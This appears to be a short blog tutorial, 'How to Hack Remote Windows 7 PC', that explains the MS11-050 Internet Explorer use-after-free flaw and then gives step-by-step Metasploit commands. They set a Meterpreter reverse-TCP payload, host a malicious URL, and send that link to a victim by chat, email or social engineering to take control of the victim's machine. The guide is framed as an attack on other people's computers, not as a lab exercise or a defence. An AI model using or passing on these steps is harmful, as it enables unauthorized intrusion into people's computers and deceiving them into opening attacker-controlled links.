How to Hack Remote Windows 7 PC

MS11-050 IE mshtml!CObjectElement Use After Free

This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs when an invalid <object> tag exists and other elements overlap/cover where the object tag should be when rendered (due to their styles/positioning). The mshtml! CObject Element is then freed from memory because it is invalid. However, the mshtml! CDisplay object for the page continues to keep a reference to the freed <object> and attempts to call a function on it, leading to the use-after-free. Please note that for IE 8 targets, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).

Exploit Targets

Internet Explorer 7 on XP SP3

Internet Explorer 7 on Windows Vista

Internet Explorer 8 on XP SP3

 Internet Explorer 8 on Windows 7


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ms11_050_mshtml_cobjectelement

Msf exploit (ms11_050_mshtml_cobjectelement)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_050_mshtml_cobjectelement)>set lhost (IP of Local Host)

Msf exploit (ms11_050_mshtml_cobjectelement)>set srvhost (This must be an address on the local machine)

Msf exploit (ms11_050_mshtml_cobjectelement) set uripath win7tricks (The Url to use for this exploit)

Msf exploit (ms11_050_mshtml_cobjectelement)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *